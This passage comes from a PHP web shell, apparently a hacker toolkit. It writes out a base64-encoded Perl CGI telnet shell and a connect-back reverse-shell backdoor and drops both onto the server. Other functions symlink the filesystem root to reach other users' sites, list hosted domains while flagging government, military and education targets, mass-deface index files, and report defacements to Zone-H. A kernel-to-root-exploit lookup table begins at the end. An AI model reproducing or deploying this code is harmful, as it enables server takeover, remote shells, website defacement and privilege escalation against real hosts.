2195. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
2196. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
2197. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
2198. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
2199. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
2200. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
2201. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
2202. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
2203. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2204. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
2205. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
2206. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
2207. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
2208. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2209. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
2210. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
2211. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
2212. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
2213. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
2214. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
2215. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
2216. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
2217. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
2218. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
2219. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
2220. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2221. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
2222. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
2223. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
2224. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
2225. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
2226. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2227. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
2228. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
2229. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
2230. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
2231. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
2232. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
2233. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
2234. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
2235. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
2236. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
2237. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
2238. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2239. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
2240. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
2241. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
2242. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
2243. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2244. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
2245. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
2246. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
2247. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
2248. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
2249. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
2250. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
2251. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
2252. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
2253. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
2254. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
2255. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
2256. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
2257. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
2258. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
2259. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
2260. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
2261. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
2262. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
2263. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
2264. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2265. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
2266. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
2267. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
2268. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
2269. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
2270. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2271. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
2272. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
2273. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
2274. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
2275. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
2276. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
2277. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
2278. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
2279. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
2280. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
2281. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
2282. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
2283. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
2284. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2285. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
2286. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2287. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
2288. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
2289. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
2290. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
2291. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
2292. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
2293. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
2294. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
2295. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
2296. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
2297. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
2298. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
2299. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
2300. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
2301. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
2302. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
2303. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
2304.  
2305. $file = fopen("izo.cin" ,"w+");
2306. $write = fwrite ($file ,base64_decode($cgishellizocin));
2307. fclose($file);
2308. chmod("izo.cin",0755);
2309. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
2310. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
2311. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
2312. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
2313. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
2314. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
2315. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
2316. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
2317. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
2318. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
2319. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
2320. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
2321. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
2322. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
2323. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
2324. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
2325. YXRhY2hlZFxuXG4iOw==';
2326.  
2327. $file = fopen("dc.pl" ,"w+");
2328. $write = fwrite ($file ,base64_decode($netcatshell));
2329. fclose($file);
2330. chmod("dc.pl",0755);
2331. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
2332. echo '</div>';
2333. printFooter();
2334.  
2335. }
2336.  
2337.  
2338. function actionSymlink(){
2339.  
2340. printHeader();
2341.  
2342. echo '<form action="" method="post">';
2343.  
2344. @set_time_limit(0);
2345.  
2346. echo "<center>";
2347.  
2348. @mkdir('sym',0777);
2349. $htaccess = "Options all \n DirectoryIndex Index.php \n AddType text/plain .php \n AddHandler server-parsed .php \n
2350.  
2351. AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2352. $write =@fopen ('sym/.htaccess','w');
2353. fwrite($write ,$htaccess);
2354. @symlink('/','sym/root');
2355. $filelocation = basename(__FILE__);
2356. $read_named_conf = @file('/etc/named.conf');
2357. if(!$read_named_conf)
2358. {
2359. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
2360. }
2361. else
2362. {
2363. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1'
2364.  
2365. cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
2366. foreach($read_named_conf as $subject){
2367. if(eregi('zone',$subject)){
2368. preg_match_all('#zone "(.*)"#',$subject,$string);
2369. flush();
2370. if(strlen(trim($string[1][0])) >2){
2371. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
2372. $name = $UID['name'] ;
2373. @symlink('/','sym/root');
2374. $name = $string[1][0];
2375. $iran = '\.ir';
2376. $israel = '\.il';
2377. $indo = '\.id';
2378. $sg12 = '\.sg';
2379. $edu = '\.edu';
2380. $gov = '\.gov';
2381. $gose = '\.go';
2382. $gober = '\.gob';
2383. $mil1 = '\.mil';
2384. $mil2 = '\.mi';
2385. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",
2386.  
2387. $string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
2388. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",
2389.  
2390. $string[1][0]))
2391. {
2392. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
2393. }
2394. echo "
2395. <tr>
2396.  
2397. <td>
2398. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
2399. </td>
2400.  
2401. <td>
2402. '.$UID['name']."
2403. </td>
2404.  
2405. <td>
2406. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
2407. </td>
2408.  
2409. </tr></div> ";
2410. flush();
2411. }
2412. }
2413. }
2414. }
2415.  
2416. echo "</center></table>";
2417. printFooter();
2418. }
2419.  
2420. function actionDeface(){
2421. printHeader();
2422. echo "<h1>Single User Mass Deface</h1><div class=content>";
2423.  
2424. ?>
2425. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g
2426.  
2427. (null,null,this.path.value,this.file.value,this.Contents.value);return false;">
2428. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
2429. <br>file name : <input type=text name=file size=20 value="Index.php">
2430. <br>Text Content : <input type=text name=Contents size=20 value="Hacked By Dark Security Hackers">
2431. <br><input type=submit value="Deface"></p></form>
2432.  
2433. <?php
2434. if($_POST['a'] == 'Deface'){
2435. $mainpath=$_POST[p1];
2436. $file=$_POST[p2];
2437. $txtContents=$_POST[p3];
2438. echo "";
2439. $dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
2440. while($row=readdir($dir))
2441. {
2442. $start=@fopen("$row/$file","w+");
2443. $code=$txtContents;
2444. $finish=@fwrite($start,$code);
2445. if ($finish)
2446. {
2447. echo "$row/$file > Done<br><br>";
2448. }
2449. }
2450. echo "";
2451. }
2452. echo '</div>';
2453. printFooter();
2454. }
2455.  
2456.  
2457. /* test function - reserved by Scr1pt3r */
2458. function actionTest(){
2459. printHeader();
2460. echo '<h1>Testing function</h1><div class=content>';
2461. echo '<br>';
2462.  
2463. ?>
2464. <form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
2465. Name: <input type="text" name="fname" />
2466. <input type="submit" value=">>">
2467. </form>
2468. </br>
2469. <?php
2470.  
2471. if($_POST['a'] == 'Test') {
2472. $out = $_POST['p1'];
2473. echo "name : $out";
2474.  
2475. }
2476. echo '</div>';
2477. printFooter();
2478. }
2479.  
2480. function actionDomain(){
2481. printHeader();
2482. echo '<h1>local domain viewer</h1><div class=content>';
2483.  
2484. $file = @implode(@file("/etc/named.conf"));
2485. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
2486. preg_match_all("#named/(.*?).db#",$file ,$r);
2487. $domains = array_unique($r[1]);
2488. //check();
2489. //if(isset($_GET['ShowAll']))
2490. {
2491. echo "<table align=center border=1 width=59% cellpadding=5>
2492. <tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2493. <tr><td>Domain</td><td>User</td></tr>";
2494. foreach($domains as $domain){
2495. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2496.  
2497. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2498. }
2499. echo "</table>";
2500. }
2501.  
2502. echo '</div>';
2503. printFooter();
2504. }
2505.  
2506. function actionZHposter(){
2507. printHeader();
2508. echo '<h1>Zone-H Poster</h1><div class=content>';
2509.  
2510. echo '<form action="" method="post" onSubmit=da2
2511.  
2512. (null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
2513. <input type="text" name="p1" size="40" value="Attacker" /></br>
2514. <select name="p2">
2515. <option >--------SELECT--------</option>
2516. <option value="1">known vulnerability (i.e. unpatched system)</option>
2517. <option value="2" >undisclosed (new) vulnerability</option>
2518. <option value="3" >configuration / admin. mistake</option>
2519. <option value="4" >brute force attack</option>
2520. <option value="5" >social engineering</option>
2521. <option value="6" >Web Server intrusion</option>
2522. <option value="7" >Web Server external module intrusion</option>
2523. <option value="8" >Mail Server intrusion</option>
2524. <option value="9" >FTP Server intrusion</option>
2525. <option value="10" >SSH Server intrusion</option>
2526. <option value="11" >Telnet Server intrusion</option>
2527. <option value="12" >RPC Server intrusion</option>
2528. <option value="13" >Shares misconfiguration</option>
2529. <option value="14" >Other Server intrusion</option>
2530. <option value="15" >SQL Injection</option>
2531. <option value="16" >URL Poisoning</option>
2532. <option value="17" >File Inclusion</option>
2533. <option value="18" >Other Web Application bug</option>
2534. <option value="19" >Remote administrative panel access bruteforcing</option>
2535. <option value="20" >Remote administrative panel access password guessing</option>
2536. <option value="21" >Remote administrative panel access social engineering</option>
2537. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
2538. <option value="23" >Access credentials through Man In the Middle attack</option>
2539. <option value="24" >Remote service password guessing</option>
2540. <option value="25" >Remote service password bruteforce</option>
2541. <option value="26" >Rerouting after attacking the Firewall</option>
2542. <option value="27" >Rerouting after attacking the Router</option>
2543. <option value="28" >DNS attack through social engineering</option>
2544. <option value="29" >DNS attack through cache poisoning</option>
2545. <option value="30" >Not available</option>
2546. </select>
2547. </br>
2548. <select name="p3">
2549. <option >--------SELECT--------</option>
2550. <option value="1" >Heh...just for fun!</option>
2551. <option value="2" >Revenge against that website</option>
2552. <option value="3" >Political reasons</option>
2553. <option value="4" >As a challenge</option>
2554. <option value="5" >I just want to be the best defacer</option>
2555. <option value="6" >Patriotism</option>
2556. <option value="7" >Not available</option>
2557. </select>
2558. </br>
2559. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
2560. <input type="submit" value="Send Now !" />
2561. </form>';
2562. echo "</td></tr></table></form>";
2563.  
2564. if($_POST['a'] == 'ZHposter')
2565. {
2566. ob_start();
2567. $sub = @get_loaded_extensions();
2568. if(!in_array("curl", $sub))
2569. {
2570. die('[-] Curl Is Not Supported !! ');
2571. }
2572.  
2573. $hacker9 = $_POST['p1'];
2574. $method9 = $_POST['p2'];
2575. $neden9 = $_POST['p3'];
2576. $site9 = $_POST['p4'];
2577.  
2578. if (empty($hacker9))
2579. {
2580. die ("[-] You Must Fill the Attacker name !");
2581. }
2582. elseif($method9 == "--------SELECT--------")
2583. {
2584. die("[-] You Must Select The Method !");
2585. }
2586. elseif($neden9 == "--------SELECT--------")
2587. {
2588. die("[-] You Must Select The Reason");
2589. }
2590. elseif(empty($site9))
2591. {
2592. die("[-] You Must Inter the Sites List ! ");
2593. }
2594.  
2595. $i = 0;
2596. $sites = explode("\n", $site9);
2597. while($i < count($sites))
2598. {
2599.  
2600. if(substr($sites[$i], 0, 4) != "http")
2601. {
2602. $sites[$i] = "http://".$sites[$i];
2603. }
2604. ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites
2605.  
2606. [$i]);
2607. echo "Site : ".$sites[$i]." Defaced ! </br>";
2608. ++$i;
2609. }
2610. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
2611.  
2612. }
2613. echo '</div';
2614. printFooter();
2615. }
2616.  
2617. function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
2618. {
2619. $k = curl_init();
2620. curl_setopt($k, CURLOPT_URL, $url9);
2621. curl_setopt($k,CURLOPT_POST,true);
2622. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".
2623.  
2624. $reson9);
2625. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2626. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2627. $kubra = curl_exec($k);
2628. curl_close($k);
2629. return $kubra;
2630. }
2631.  
2632. function rootxpL()
2633. {
2634. $v=@php_uname();
2635. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2,
2636.  
2637. h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump,
2638.  
